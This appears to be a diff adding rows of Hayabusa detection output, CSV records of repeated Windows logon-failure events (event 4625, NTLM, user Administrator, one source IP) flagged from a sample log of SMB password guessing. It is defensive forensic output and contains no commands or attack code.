+2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JfLQAaB0DPvxWQMB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A0kvHMwnj2k0HMLQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kPqfVDftcR4iRDaw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1bltwm2g13InAJM6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J2iFr8ppe5NzukXF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7EEUOBohBFRze6hL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NCOFn3WM71KmaZyB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UdUkBxB1auduRfdS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E2JaWoYK56HRGfW1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a3JTCX9NIOpg6TFB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zFGkdUVAdKcrrREB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7oZW00FpKema01Vw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p4HbNQx0Acf83b1h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j9aM5UCQbOLvcpI0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BGGChEAIdej9lBhr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4CaFYB1ImWAWbH0W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OLa3lkxWiJ00raQh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vMzyi0jIVLNrodC8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n2repX0roAP2j0TI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gqcpIjdkNpmoTe4A  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Edgo9UdNvmMJpiyn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LpqOTu7Xn7ULipmN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TP0efL79STMbuu9g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HkwWfRi0E5sVY6UT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IkyCe9NXGExCQS5r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IGnhRwa7P7by9vJO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fh7IGliNbSyKwxpM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1QfgWsAqSYQfB9l5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q8VM66P8Vluf7yrL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cdYiwh3QjdA0Zoge  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ou3FPUI5bFcUvuFC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bMUg8N7apFtUgX9d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U7Cn4n7jQAQaxP6y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: urflPvd1vgYYi2ra  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pqFtTDD69fNTKROG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: teUZYpNyqJ64Dgcz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9kaKSy3DV5fRKvTc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gtiZUzpwrnuWIjna  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SD9UhsShNJRp251r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C5xbL7aO0azgBxfz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xqrUpW8PpI9RAeGk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M80K04eYwfwdzIul  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jcWY7cNeCNgJ3Czr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1OA561UrTkFnbEj3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iDnu1G7jmwLoXGLF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e2v70poTOKPUNZJo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhzoOmgTrdvTS27z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pyvmBFGhKFgvzM9S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qHC0keHW2YsKeP02  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 29vkwuFa6njYc86s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s9687XPVHFiwttdm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AcNGaeTqTydGinJE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dWRu7ZC1eo1nn0IQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M52CihyrQk9MOfCR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xBKSOZwS6f9ofXu7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uT1LHJs7kyeMmTtd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7FvZhetkdjnZOSpq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0DDC7WfL5T4d01yT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1dUzuddZH3Stespw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LKpORcDX0ccf1xMq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u4RbbKttCYPld8RR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: joni643cVcuBZH9K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bqY6TkW782CWKtvK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d8c1I63ULh17l0rN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cjOtMpWutC9qeSss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gmsFnerFYwXXe4Wt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rzIZ4vC0E2CYq5mc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0uZe50jJH0aj9xZi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LZM5UuxLymuAMJcw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iF1dq6UfuqpFpGkf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NQVTj9OLayvEg8dg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 98F9mULm7DsRUN49  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
